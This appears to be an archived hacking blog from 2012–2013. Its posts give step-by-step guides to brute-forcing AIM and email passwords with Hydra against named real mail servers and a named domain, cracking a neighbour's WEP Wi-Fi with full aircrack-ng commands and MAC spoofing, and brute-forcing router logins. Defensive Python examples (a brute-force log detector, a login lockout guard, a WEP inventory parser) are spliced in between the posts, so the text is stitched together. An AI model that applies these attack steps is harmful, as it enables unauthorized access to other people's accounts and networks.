Saturday, April 27, 2013

Using Xhydra to hack AIM (AOL Instant Messenger) screen names.

I really love Backtrack 5 and all the tools it comes with: Metasploit, Xhydra and Nmap being some of the most popular. But there's nothing I enjoy more than the feeling of success, the feeling you get when your hard work finally pays off and the password goes through. I had a lot of fun doing this as a password pentester back in my younger days. I was surprised at just how easy it was to get people's passwords using a brute forcer and the right server configuration. I was popular on AIM. I had over 160 friends, and what that meant is that I had over 160 active screen names to try and get the password to!
Here's how it's done.
Fire up a terminal, Zenmap and Xhydra.

Ping smtp.aol.com; your output should look like this:
In some circumstances the IP address will be different. I will supply you with the correct one, but hypothetically any IP address will work.

step 1. ping smtp.aol.com (64.12.175.136)

step 2. port scan the IP address and verify port 587 (SMTP AUTH) is open

step 3. input data into Xhydra
-target tab-
single target: 64.12.175.136
port: 587
service: smtp

-password tab-
username: programmerdemon (or any screen name)
password: password list (I have my own)
*others can be found in /root/pentest/passwords/wordlist/
*or /root/pentest/passwords/john/password.lst
*or here

-tuning tab-
about 8 tasks should be fine

-start-

It was my screen name so I didn't show the password. Also, you may want to use a proxy. Any questions, don't hesitate to email.
Thanks!

Friday, April 26, 2013

Installing Backtrack 5 R3 to hard drive and Dual boot with Windows.

Believe it or not, a few of my readers are having a hard time with this. It's ok. I was there, many times before. Fortunately, Backtrack 5 is relatively easy to install to your hard drive and make bootable. I remember before Backtrack there was a Linux distribution called P.H.L.A.K., an acronym for "Professional Hackers Linux Assault Kit". Anyway, during the first few releases it was nearly impossible to install to the hard disk. You had to manually partition the drive yourself, configure the boot loader yourself and then hope that you didn't lose any data creating the swap and ext partitions. Backtrack 5 does it all automatically. I have a few pictures (taken with a smartphone) to help guide the way for you.
I highly advise installing Backtrack 5 to the hard drive. The CD loader takes waaay too long to get anything done, and you really don't need to use a whole lot of hard drive space.

The first thing you need is a computer running Backtrack 5 from a live DVD.
Then all you have to do is click the Install Backtrack icon.



Starting here:
go through each step.
Steps 1, 2 and 3 are language, time zone and keyboard layout.
After that, it can be a bit tricky resizing and partitioning the drive.


What you want to do here is click "Install them side by side, choosing between them each startup".
What this will do is keep your Windows or other OS partitions but resize them, making disk space available to install Backtrack 5 on. At the bottom of the screen there is a slider; on the right side, slide the slider to the desired size of your Backtrack partition. I chose 40.1GB. That's plenty for me. Unless you're going to be keeping a lot of files and saving music and images, you really shouldn't need more than 30GB.

Click Forward, then Continue. The setup will then install Backtrack after partitioning the drive.
Keep in mind, the new boot loader will have BT5 as the first option by default. Just hit the down arrow to select your other OS.
All questions are welcome by email:

davidjgeraway@gmail.com 

Wordlist to start with for passwords

Due to the recent popularity of this post, and through multiple complaints that people don't want to spend the 30 seconds to copy/paste out of a page and make their own document, I have provided a download link to the .txt. I'm not too familiar with Google Docs, so please don't try any XSS with the provided link to the PW list.
BASIC PASSWORD FILE

Tuesday, January 1, 2013

Cracking WEP with BackTrack

I admit, one of my favorite things to do in Backtrack is to crack a good ole WiFi. It can lead to so many different options and really brings me back to my roots as to why I stumbled upon Backtrack in the first place. I guess it's just thrilling; it gives me sort of a high to be in places I shouldn't. To be able to completely exploit an entire network as a local user is definitely something that's fun and exciting. I do want to stress the fact that even though we've all maybe done it once or twice, black hat hacking is entirely unethical and not condoned here. I may sound hypocritical, but I do not do anything malicious to the machines I exploit. I have permission to do so. This is an ethical hacker's website for information and security purposes only.
I'm far from a pro hacker. I'm maybe intermediate at best. If anything looks out of the ordinary, feel free to email me with any questions or tips. I don't claim to be the best; I'm still learning. However, what I have learned thus far I'm willing to share, so here goes:

Today I'm going to demonstrate how insecure WEP encryption is over WiFi. In today's world you have a lot of people that like to set it and forget it. I'm sure most readers have heard of Verizon, a pioneer in telecom. Well, in my area Verizon offers high speed internet, DSL and FiOS. Great service most of the time. The problem is their Westell DSL modems/WiFi routers come preset to use WEP encryption. I really wish they would catch on to this. My neighbor has DSL through Verizon. Westell modem, WEP WiFi!
Let's see what we can do!
We will be using the air tools, fun fun.

Fire up a shell and run the commands as follows:

1. airmon-ng

wlan1 is my interface. These can vary, so yours may be different.

Next, with the interface airmon-ng has given you (wlan1), you want to run these 4 commands:

1. airmon-ng stop wlan1 (stops the wlan1 interface)
2. ifconfig wlan1 down (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the MAC address)
4. airmon-ng start wlan1 (restarts the interface with the new MAC)
Below is what it looked like for me.

In some situations your network adapter may not be supported. I will compile a list of supported network adapters in the future, or you can Google it.
I have this one:

However, if it did work then you have successfully faked the MAC and it's time to keep on moving.
The next thing, and this is obviously important, is to pick a network. Do this by running this command:

1. airodump-ng wlan1 (MAKE SURE YOU'RE USING YOUR INTERFACE)

After you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. Hit CTRL+C to cancel the running application and choose a good network that is WEP.
I have the network I want to crack in my crosshairs. It's highlighted below:
The next thing we must do is configure airodump-ng to watch that specific network and capture the unique data holding the password, writing it to a file (hackedwifi, or whatever you decide to name it).
The command is as follows:

1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)

For me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1


This is what your output should look like:

Keep in mind, rather than opening several terminals I like to tab them using CTRL+SHIFT+T.
While you have airodump running, in a separate terminal run this command:

1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

For me the command looks like this:

aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1

In most cases, and what you want to happen, is output saying "association successful" with a smiley face. This is good, and if you get this output you are on the right track. If not, email me and I will be happy to help you out.


Now that you are associated with the access point, we need to use aireplay-ng to create an abundance of data on the network so we can sniff out the encrypted PW. Run this command:

1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

For me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1


Now it's time to wait. You will notice airodump going crazy collecting data. Personally, sometimes I leave the room or go do something else for about 20 minutes. What you want is to collect enough data for the cracker. Watch the #Data column. I like to wait until it's between 10,000 and 20,000 before I run the cracker.

Ok, it's been about a half hour and it's time to run the cracker. Run this command:

1. aircrack-ng -b (bssid) (filename-01.cap)

If you forgot your file, just type "dir" and it will be a .cap file.
Mine looks like this:
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
If you did not sniff enough data it will look like this:
And IF you did it will look like this:

The key to the wireless network is: 6HSKV
To prove it worked I took a screenshot in Win7.

Happy Hacking!

Questions, email me: davidjgeraway@gmail.com
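The airodump-ng -w prefix used above also writes prefix-01.csv beside the .cap. As an added example from the audit side (not code from the post or from the aircrack-ng project), here is a parser for that CSV that lists every access point still advertising WEP with its attached client count, so a site owner can find the legacy APs that need moving off WEP. The rows are constructed (one reuses the BSSID/ESSID shown in the post) and follow airodump-ng's CSV layout of an AP table, a blank line, then a station table.

```python
"""List access points still advertising WEP from an airodump-ng CSV.

Added example, not part of the blog post. airodump-ng -w <prefix> also writes
<prefix>-01.csv: an AP table, a blank line, then a station table. The rows
below are constructed in that layout for an offline run.
"""
import csv
import io

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:12:0E:55:29:13, 2013-01-01 12:00:00, 2013-01-01 12:30:00,  6,  54, WEP , WEP, OPN, -40,     1800,    15000,   0.  0.  0.  0,  12, 06B409983674,
00:1A:2B:3C:4D:5E, 2013-01-01 12:00:00, 2013-01-01 12:30:00, 11,  54, WPA2, CCMP, PSK, -55,     1790,        0,   0.  0.  0.  0,   9, HomeNet01,
00:DE:AD:BE:EF:01, 2013-01-01 12:05:00, 2013-01-01 12:30:00,  1,  11, WEP , WEP, SKA, -70,      900,      120,   0.  0.  0.  0,   7, OldShop,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
A4:12:34:56:78:9A, 2013-01-01 12:10:00, 2013-01-01 12:30:00, -45,    14000, 00:12:0E:55:29:13,
3C:AA:BB:CC:DD:EE, 2013-01-01 12:01:00, 2013-01-01 12:29:00, -60,      800, 00:1A:2B:3C:4D:5E,
"""


def parse_airodump_csv(text):
    """Split the file into its two tables: (ap_rows, station_rows) as dicts."""
    ap_part, _, sta_part = text.strip().partition("\n\n")

    def rows(block):
        reader = csv.reader(io.StringIO(block), skipinitialspace=True)
        header = [h.strip() for h in next(reader)]
        return [dict(zip(header, (c.strip() for c in r))) for r in reader if r]

    return rows(ap_part), rows(sta_part)


def wep_inventory(text):
    """WEP APs with channel, captured IVs and client count, busiest first."""
    aps, stations = parse_airodump_csv(text)
    clients = {}
    for s in stations:                       # count associated stations per BSSID
        clients[s["BSSID"]] = clients.get(s["BSSID"], 0) + 1
    report = []
    for ap in aps:
        if "WEP" not in ap["Privacy"]:       # only legacy WEP networks are of interest
            continue
        report.append({
            "bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": int(ap["channel"]),
            "ivs": int(ap["# IV"]), "clients": clients.get(ap["BSSID"], 0),
        })
    return sorted(report, key=lambda r: (-r["clients"], -r["ivs"]))
```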

Friday, September 14, 2012

Hacking email addresses using zenmap, xhydra and a wordlist.

I have set up a rogue email account on a web server that I own a lease to. What we are going to do is find the IP address of the server that sends the mail, scan for open ports to mail services (POP3 and SMTP), input the data into Hydra and in return brute force the password.
I have done this on many occasions as a security tester, and what I have found is that MOST people use the same password for everything. That's why it's important to keep your email password exclusive. What I have found 90% of the time is that people have everything linked to their main email address: online banking, website registration and Facebook, to name a few. All you have to do after gaining access to an important email account is a little detective work along with some "forgot password" forms, and then you pretty much own the e-identity. I'm going to show you how to prevent this from happening to yourself and your clients.
Please note these are real hacking methods that are going to be tested on real servers. One of the IPs I'm going to release correlates to a GoDaddy hosted server, and even though anyone can find this, I want to say I do not condone black hat hacking, nor do I advise anyone to use these methods for malicious use. Let's get started.

www.brotherspropertymanagement.com will be our target for this example.

In Backtrack 5, fire up a terminal, Zenmap and Hydra-GTK.

Ping the desired web server:
We see a secureserver hostname along with the IP. Typically in this instance I would run a Zenmap scan on it.
However, no mail server is returned. This is a practical example of where we can be derailed, because the mail server is different from the one we scanned. But with a little research we can easily find the mail server AND SETTINGS on Google using the hostname.
We have found the link for email setup. You will only need to do this if the web server is hosted by a product like GoDaddy. In some situations the web server will include all services needed to run the website and some back end things like FTP, HTTP, POP, SMTP and MySQL.
Click the link.
Those are the settings. Now we see we have 2 options: pop.secureserver.net and smtpout.secureserver.net. Please keep this in mind: these 2 servers HOST ALL MAIL for GoDaddy websites. This is dangerous because if you really wanted to you could scan a range of GoDaddy IPs, visit the websites, copy the email addresses and make a list to brute force. This is why I strongly advise a secure password.
Let's choose SMTP. It's not encrypted, doesn't kick us off after a few attempts at password breaking AND IT'S FAST, SUPER FAST.
Ping smtpout.secureserver.net a few times and you will see the IP is different. It really doesn't matter, so open Xhydra and configure it like this:
single target: smtpout.secureserver.net (this is the mail server)
port: 25 (this is the default unencrypted SMTP port)
protocol: smtp (simple mail transfer protocol)
As always, check off "show attempts".


On the passwords tab, for username you always want the full user with the @domain.com at the end. Our user is
rogueaccount@brotherspropertymanagement.com
Select your password list. Refer to my last post on how to find a wordlist in Backtrack.
Or click here for a wordlist.

Go to the start tab and click start.

Then we have success. I will be removing the rogue account so you little bastards don't try any funny business.


RECAP:
1. Find target
2. Find SMTP mail server
3. Input data into Hydra
4. Crack away
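Both this post and the AIM post above depend on a mail server that accepts SMTP AUTH attempts without limit. As an added example from the defender's side (not code from the post, from Hydra or from Postfix), here is a small detector that reads Postfix/SASL-style failure lines and flags any source address that fails too often inside a sliding window. The log lines are constructed, and the threshold and window are assumptions.

```python
"""Flag SMTP AUTH password guessing from mail-server logs.

Added example, not from the blog post. The log lines are constructed in the
shape Postfix writes SASL failures; the window and threshold are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: one client spraying passwords at the server, plus a
# legitimate user who mistyped once and then logged in.
SAMPLE_LOG = """\
Sep 14 10:00:01 mx postfix/smtpd[2211]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 14 10:00:02 mx postfix/smtpd[2211]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 14 10:00:02 mx postfix/smtpd[2212]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 14 10:00:03 mx postfix/smtpd[2213]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 14 10:00:03 mx postfix/smtpd[2214]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 14 10:00:05 mx postfix/smtpd[2215]: warning: unknown[203.0.113.5]: SASL LOGIN authentication failed: authentication failure
Sep 14 10:07:30 mx postfix/smtpd[2290]: warning: host.example.net[198.51.100.7]: SASL LOGIN authentication failed: authentication failure
Sep 14 10:07:31 mx postfix/smtpd[2290]: 3F2A1C0D: client=host.example.net[198.51.100.7], sasl_method=LOGIN, sasl_username=bob
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ postfix/smtpd\[\d+\]: "
    r"warning: \S+\[(?P<ip>[\d.]+)\]: SASL \w+ authentication failed"
)


def parse_failures(text, year=2012):
    """Yield (timestamp, source_ip) for every SASL authentication failure."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:   # syslog lines carry no year, so one is supplied by the caller
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"]


def brute_force_sources(text, threshold=5, window_s=60):
    """Return {ip: peak failures seen inside one window} for ips over threshold."""
    recent = defaultdict(deque)   # ip -> failure timestamps inside the window
    flagged = {}
    for ts, ip in sorted(parse_failures(text)):
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:   # expire old failures
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged
```

The single mistyped login from 198.51.100.7 stays below the threshold, while the six failures in four seconds from 203.0.113.5 are flagged; the same per-source counting is what a jail such as fail2ban applies before blocking the address.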








Monday, September 10, 2012

Using XHydra to hack router password

Here we are. Firstly, I must advise you to only use these methods to test your own security. I will be hacking my own email address / router password as an example.
Here are your tools; all can be found in Backtrack 5 and some earlier versions.

*Update 4/27/2013*
Given the popularity of this post, I have written a part two: Using Xhydra to hack AOL Instant Messenger passwords (AIM).


Start X-Hydra.
Also start Zenmap.

Everything should start by looking like this:
We will start by hacking a local network router password. This can be very useful to a hacker in the scenario where one has cracked a WiFi password and gained local access to the network. After gaining access to the router the possibilities are endless: all router security can be disabled and then we can perform MitM attacks (I will write an article on this later). If you're experienced enough in networking then you get the picture.
Typically a router's IP address will start with 192.168.x.x (which it may in your case). To check this, type ipconfig in Windows and ifconfig in Linux; the router's IP will be the default gateway.
Now I'm sure you have seen this before:


What we are going to do is tell Xhydra to connect to the router's HTTP server with a protected page, input the username and brute force the password. Note this method can be used against any similar password protected page not using forms (I will make another post on how to use it against forms later).

So your input should be like this:
Check off show attempts as it makes it easier. Single target SHOULD BE YOUR DEFAULT GATEWAY, perhaps 192.168.0.1. Do not use this against websites or hardware you do not own or have permission to test. Important: port should be 80 or in some cases 8080. EVEN MORE IMPORTANT, under PROTOCOL find http-get and click it. To find open ports on a device, just scan the target IP with Zenmap.
Back to Hydra.


In most cases the username will be admin. Also in most cases the password will be either "password", "admin" or BLANK.
However, in my situation the default password is far different from admin or blank, so what I have done is selected a wordlist. You can find many wordlists using Google. Typically the bigger the better, especially on a local network. Backtrack comes with a few; they can be found in /root/pentest/passwords/wordlists.
I have compiled my own and named it password.lst.
Click here for a basic wordlist.
So:
click username and enter admin
click Password list and select your list
also check off "try login as password" and "try empty password"
then move to the Specific tab.
change http / https url to just a slash: /
This tells Hydra what directory the protected page is on the server.

Go to the start tab and click start. Results will follow.
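The counterpart to the protected-page login above from the defender's side, as an added example that is not code from the post or from Hydra: a small guard to place in front of any Basic-auth check that locks a source out after repeated failures inside a window, compares digests in constant time, and reports accounts still set to the default passwords the post lists. The user store, the limits and the plain SHA-256 digest are assumptions for illustration.

```python
"""Lock out password guessing against a Basic-auth protected page.

Added example (not from the blog post): a guard to put in front of any
handler that checks a username/password pair. The user store, limits and
the plain SHA-256 digest are illustrative assumptions; production code
should use a slow salted hash such as PBKDF2 or argon2.
"""
import hashlib
import hmac
from collections import defaultdict, deque

DEFAULT_PASSWORDS = {"", "password", "admin"}   # defaults the post says are common


class BasicAuthGuard:
    def __init__(self, users, max_failures=5, window_s=300, lockout_s=900):
        self.users = users                    # {username: sha256 hex digest}
        self.max_failures, self.window_s, self.lockout_s = max_failures, window_s, lockout_s
        self.failures = defaultdict(deque)    # source ip -> recent failure times
        self.locked_until = {}                # source ip -> time the lockout ends

    @staticmethod
    def digest(password):
        return hashlib.sha256(password.encode()).hexdigest()

    def check(self, ip, username, password, now):
        """Return 'ok', 'denied' or 'locked'; failures are counted per source."""
        if self.locked_until.get(ip, 0) > now:
            return "locked"
        # Always compare against some digest so unknown users cost the same time
        expected = self.users.get(username, self.digest(""))
        matches = hmac.compare_digest(expected, self.digest(password))
        if matches and username in self.users:
            self.failures.pop(ip, None)
            return "ok"
        q = self.failures[ip]
        q.append(now)
        while now - q[0] > self.window_s:     # drop failures older than the window
            q.popleft()
        if len(q) >= self.max_failures:
            self.locked_until[ip] = now + self.lockout_s
            q.clear()
            return "locked"
        return "denied"


def weak_default_credentials(users):
    """Accounts whose stored digest matches one of the common default passwords."""
    weak = {BasicAuthGuard.digest(p) for p in DEFAULT_PASSWORDS}
    return sorted(u for u, h in users.items() if h in weak)
```

A correct password submitted while the source is locked is still refused, which is what turns a wordlist run from a matter of time into a matter of hours per handful of guesses.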


This quick tutorial is mainly for people beginning. I do not claim to be an expert in the field, however I am qualified to talk about these things. Hydra is a powerful tool. It can be used for much more than just brute forcing protected page passwords. There are numerous protocols: FTP, POP3, SMTP and SSH being my favorites. In the next tutorial I will get a little more in depth on the scanning part and I will show you how to do this with virtually any email address.
Questions, please email: davidjgeraway@gmail.com

Wednesday, September 5, 2012

Introduction to hacking

Hello World. The purpose of this blog will be to give back to the community from which I have learned so much. I chose to write about this topic for three reasons:
a) I enjoy it
b) it's something I feel I'm qualified to write about.
c) it can help me to learn more

So let's start with what it means to "hack". For me, it is to gain access (authorized or not) to another system run by an operating system, using computer software and programming knowledge. Hacking can be done to many things for good and bad reasons. A "hack" can also be a modification of firmware or hardware for whatever justified reason.

However, I get the suspicion that most who stumble upon this blog are looking for point and click references or a step by step "how-to" guide. (I will be doing that, with screenshots!)
BELIEVE me, I was there. I was a script kiddie. In today's world hacking comes a lot easier, as there are many tools and resources for you to use. Backtrack, the Linux distribution, is a whole operating system full of hacking tools.
My first tutorial will be about using ping, nmap and Hydra GTK in a method called brute forcing to test security on email passwords and local router access. See you soon!